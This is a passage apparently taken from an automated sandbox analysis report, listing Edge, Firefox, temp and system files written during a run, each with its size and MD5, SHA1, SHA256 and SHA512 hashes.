                                                                                                                                                                                                                                          0bdaeafdddda1d6dc2274c1f4b5817e9

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          0751fe2143281b5b948a58d751f7e2795314318e

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          198f42d4dbc2e47d51d09fbad334d7fe4be34420893dd0de4eff7c3e6c51cdf1

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          2f3bbb63dfe61cdc4c385d0df5d16577c80209dcca88949ae767caec70a4cf3bd11bb09cf94251148819f8f4521b6848f0977d941e5cbd7462703ac365bbc889

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\f_000001

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          16KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          9cf8751027fec6b2f22bbd3906f02574

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          829030c8c058e6e61c53bed520051f5c154142c6

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          19972b2cd67154f06af1bd55026beb8b557217bb72b2d1716e55bddb7520e591

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          6631efe4c2a3773002aecedd81492edb22935674630d0cf37b331fa712aa102a0c717885396b4444a3bdc21471423b3eac105c65d1a3720bf2a0935ca262e8e2

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          264KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d6a97a12413ef33184bed749c1be1ca4

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          b68f942140c784dd14c0ef326ef2bb4d73849ae1

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          94eb4afc4e985626eabe0b9a8c6e98dfe210d5ecbaf84c74d33a1001e7fe838f

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          10477386657531cd2927cd06af879f11f832515318f8a80afecdf4a8d82b5de6191f2e0acb147fce770b6129d9c4275fab34661941ce73c0b5d0c9ee305b0495

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          13B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3e45022839c8def44fd96e24f29a9f4b

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          c798352b5a0860f8edfd5c1589cf6e5842c5c226

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          55KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          5b910f0bcaec3ba5ff08f1042a61ab70

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          bccbb875240989446df84c92b7a712fda69da3da

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          d7ac430e13b154b1fd9257688f9b9d96970adacece6f44a78aea70656e78b017

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d683c910fd9d81b89a13ec100bcf647c5453cd09126d029bd073985c3551870c3a4bddd9f083ac85f94c248e7c41d7e5b143d1a3a45d599a72c5ae445c821dab

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          b7fb1cb45d2c300bd46072dc721817b8

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          70d77af0dec6934406aa01c75d675e182b42097c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          d546c20a17be506542c7c76c9f719e1f720714cb946368a95a096b282fa2aa77

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          4d71a67258cf6ed45a0f436fce7ae853e5d397fc01b996f5e77db9c0cb6a426361979d3c47003939c5edcea6ccb1e61be16186d58e65bb55b97dc25b6447c776

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          50KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3e8c87619712f7ad7c3e98abd7fb15ef

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          693e197e44935f923f2f184ecd1074d6c265710f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          9b254892b797f5c5b15466c03e85f7d64d69cdaebc174b8b579210c500633c7c

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          0cff6348e303de08b222284753d09118262a23aed6f14821bcf1b6331490054c2b086aef55738aa16af25783b7cefc41dcc6d25777d829f47a698c3bf1c15632

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2c0522fc01af9f7a365386048e30456e

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3224f60789fc85c3ad2f0fe7cb3643dc62e698f5

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          f202954c3380331f6af65462764a8eacba5b2e40372f86c407f8c30049b9e540

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          758a40208f9cc26869994add77b9a04c0bdd4e06c4e68dab399bc4272c9a8f0247cda0af97e685cd46831ee260bf88a12be45dcae29c68fac9f19cf3a79bec6b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          55KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          6314016fa1f10856cab2a7eb29949c34

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          cccef0d28368dd490c025a9f04bef23de386b01f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6b8c84761f403234012794c43544e70c8de279b2c8d57b73480d001a24f55c6d

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          bb2fb91901850e2338e0f072c3185c05cc2f6356799e7b12088d381fe6b07cfbafd173549109a0e272667eadbbe5fae51c19c2f92187fef3d6368e30ccccf66a

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          55KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          fe0da7e4d9eade6c9fed2ac024d41278

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          d217f0640d9b317799facf5e33fa387e8e143ca8

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          eb95eeca3034050e3b50ca744c54118ab7f1d3a93c2574c6e40b1b11cb44ebd8

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          3f8fba548aed4c09dc8412b1bde5dbd2376d98034b994ec3cfc67bc63cde23b2a878130fee87c99d1dea6fc2e9a28059713b03bf085130d712a460112c203b1b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          264KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          27c593ffdf96335fbf4316a241f3fce9

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          285407be8a995f63dda7f361822cc4c92ccfce0f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          c00035d085cf92e966ccec698d3545b17e8632363b684f069545e4158015195d

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          cc02b7f7f42982ca30b811a9148b577a5fe7a0b8979a63affae6a76ce3ac3bc53e133d0fe92967fa38839884637f30fbbba9623ae8c5ecdf9daedb94560cb47b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          86B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          961e3604f228b0d10541ebf921500c86

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          6e00570d9f78d9cfebe67d4da5efe546543949a7

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\da2ca7d1-d13f-4f71-bbc9-0ac69a166349.tmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          62KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          99139eaf4091b076c0fa4bf492ffde22

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          23e5d67eca383c1db3592dd3a9cf7911ca511a30

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e5246f9a6e3f8e58e0403691214d49c300c2ad00c9d29c34221d9f3896cbdb10

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          577ea55894305869281c7bd44687a5cc46dee7a15143222cde00ee8c41f79e1677c9469e2c59fde635464c8913eb376b5a1b4bbf36831c320f8eac232e029eb7

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          152KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          dd9bf8448d3ddcfd067967f01e8bf6d7

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          902d8d405aab34f19e531ef1e1bf2248

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          69583da9d0912794309c1dd21a7c7622c00501bb

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          15f78ec04570c5e3c5ccaaf63adae429f518cb9d0efea01b7134878914becffd

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          852e8df803c8a5857587df50ef69fe5795c1fa0b38d77c4fb13ab4f87e7c09c2156f156f7649c5c821980b2801bd5dfce4f65bad7c87c698e5adfa7d153c1aa6

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ptqf56iz.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          13KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          027ec4166bc3a036ba2b82c502003384

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          1213536bea844b586d436c1c62b5ecb3cf61b816

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          60cdddcf3dde8a734aa5e371aff06f31a23cf01673eb476cc6af3c88684d090b

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          0278f1906c3eaccb9e00a35984a1cc7259e8818f3197e9a4d2e9b190c6225f8d4f0e2576f0d461d62d8dbeeae960fdb2173d1c12d426bd9771de8e7c3e51d0cd

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ptqf56iz.default-release\startupCache\webext.sc.lz4

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          782a8a6952bf2fe6b0842ae107fa1d60

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          6982522b012e41fe7d89ff4a05e33cf383594498

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          234209ff93266c75d839e406f02d76f84774cb5f666c172263a1e7e241c12afd

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ee3fb0b30dd320306b800df54372e0dafabc8e6e02ac1d3b2a313afb4d1276bcfaa79077d1fcbf41ad89dccce378ddd67b3b4b3bb28b378f6633cbc48236a25f

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lvrzwn11.dry.ps1

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          60B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          14.0MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          bcceccab13375513a6e8ab48e7b63496

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          63d8a68cf562424d3fc3be1297d83f8247e24142

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          11KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          25e8156b7f7ca8dad999ee2b93a32b71

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          db587e9e9559b433cee57435cb97a83963659430

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          502KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          e690f995973164fe425f76589b1be2d9

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          e947c4dad203aab37a003194dddc7980c74fa712

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_59EAE35B05C547149B6BAD1B398F91AD.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          940B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          90e9fe6a2d549fd544effc56f49b3bad

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          bf499a568b9c2c697d5bae27a5253eea34b9cf69

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6dbe7b01dfe0b4ee36ceff2ee40f8a7a23e865b06e68a6a7a143347565352573

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          611b64ca515ecc669c68836e259dc6412227b3c25269cf21794626443fbf08a0dc1bb90d24514cad848ce96ff3ada51f8acfb68db0d456169312e3c687d656ff

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          fb48973fe97ffba3ff430be0d46c199f

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          d004744866a086e9011f6d25b7762019e84e1486

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          5d7fd63475c4c7c2fc42501d08739d83214619cd078bcbf0a52fc87263ad45f5

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          a95bb7839142b114193753bb2be09f86f6516b82ed3ff105239be9cc5ac54134ee3a9fc7794ce523eba9f251cb4d30fc9498a2dd81437679f98cbecfb799855c

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          5584b44ae418dda7819eafe05a31282c

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          5314d0d451a12096fccfb9cce77172e20eec1599

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          1e534108ec1d2ccee1db538e2efb169507c103b4a54bce6176e3130a6d5e682d

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d22d1b022065903a14560f671bf29a3ea0f59516c3f3fcbe888d7c1ee429064aa1261157c2f0801add560bb2d1dcd3607a4e436d20429f522c9681d39e46ca22

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\events\events

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          c7027c57962bb978502de8c95d618c23

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          00cab3cb8a25c49919b4e1499057d4442c2a3c29

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e9e88228344135ce6609f2ad9ad67ee517f5a0caaa542e85838900888280aeb0

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          c829df88437a39d04a65dcc4af14ba49c503934f3f97e6d97053d94b40b47d1441e3df3d64557230c59d84f99c72f9691b733a3f5696683dfcab9aaf6e0437a6

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\pending_pings\5b911b6a-fcc1-436f-9393-0679484c6a0d

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          235B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          4ac5ce3d20142d76fa89c9c3391a4220

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          81d162c36809f9147b5eb8290f67ca6f14d5a3ca

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          470f5b729f16df78bbed5f789366c522e6343121d0d14553675caa7e8c4b23d2

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          40156360526b47a4676be03f77f76ba84dd407f451d5055117928c648ae8755ed97e4955bfea6c5c6c418b7a6c8c2b54de1cbcf452a0f3d54b9c508af73bcec8

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\pending_pings\7ac5da4e-1c7f-4d40-9c62-01c5450ab9c0

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f86e4244193a12cbb5d8bafde1f8a024

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          d137f61e5bc4915d425dd51124f8c3a3144b8a19

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          ea2cd77891256d8bac4dfaae31afecc223e53b6e82c90b1223688c48d2e4c45a

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          1e7be793ceeb89b52a3a9ddb47900ca3b00264ab5aecdf1a90f7aed5fdbefa3d91c5b4a7ff74feb7ec1ceb21aa5b714ee179fdc1b28422d7a156b4660e31f60a

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\pending_pings\a188efac-ee39-4be9-b7b2-91975f8e03bc

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          17KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          fa2a304a3c10cc6a17c6b4e0ea8db41a

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          1cede03876ea6b8a266ae4b43f87377e1d0a09b9

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          1e527e45af5f27bb23f9f901551016576ee020e6ef6eed6f60a357aeda993eb0

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          813a366772cfe61de132b42788b35417600b0f3a0ac0bbf7e80e2d3b78ec416662b3527740e7582718b6fbd6dbaba577d6dd9b313dd5ffcb1f8c43120d166f36

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\pending_pings\ab85a06e-9319-4d82-87da-da3dedf53982

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          886B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          9199f087ae3496878f096f59f0675362

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          9827c8e70024d5e3f05b3204b5b9123fba543471

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          90cbf7831cda77544911c0d648553f89c64d7440a718978956b7775fb6cdd6b5

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          5a1fa73e652f6b83cb31f6f550a8332844e0a476f807ab7a8c762e8bc5818eeff1b895b79e5893313747934c62e7a7c70e80116bbb0ffe153367a896998903c6

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\pending_pings\ceda348e-5f5e-490e-beb5-d4273b072267

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          883B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          179ae349f3124994796162a964ac54db

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          95fbc0b6195d89ef531bc67232f57768f4d38185

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          b7cf147a0a95a6fc8c5ba9b3513f3363d84d01ea2e8cfbb057d9839da7441d80

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          1d503bac888803cabd7606716591a20557bd30ac50ba13e7cb69f1604709b0b9f4ff6e7277462ac1ed62b322c479071c5ca78f4a71798193ca6344cfc22a3235

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\datareporting\glean\pending_pings\ff137593-cffa-43e8-a708-aa71f31fcd15

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          235B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          64396bba79acea8a5a96028211488eb5

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          45f69967cfcfd24c1746acbd8014782ecbb6c435

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          be7bd59398e323eb1cb03bfc1d8785375dcc4abd1872996fee40c6ee26861f70

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          82767bdedcc03dd53127d0c035d72960444156ee25556172a5811a172ca82d343df315c39c243f13499abbc53115154f487fdf46c829f12aed2680b6e106268b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\extensions.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          16KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3474daebbaf008d6f61679acbe0dde94

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          1b7e637d724e31784467869f023cdd70f4e03ac9

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3c58c548d4202f658eed2a715ac2715d6942729c66a72fb139bead2cadf89103

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          c77cedc64402a63f737dfb2f61b447d9ad48b72a5b8413708ec78d7a7fe8f4dab8b25240530e99acb66da71bfa6eea7cb3030dfef329461d441027bf1437ca6c

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          626073e8dcf656ac4130e3283c51cbba

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          7e3197e5792e34a67bfef9727ce1dd7dc151284c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          37c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          116B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          ae29912407dfadf0d683982d4fb57293

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          0542053f5a6ce07dc206f69230109be4a5e25775

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          6f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1001B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          32aeacedce82bafbcba8d1ade9e88d5a

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          a9b4858d2ae0b6595705634fd024f7e076426a24

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          4ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          67dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          18.5MB

                                                                                                                                                                                                                                          MD5

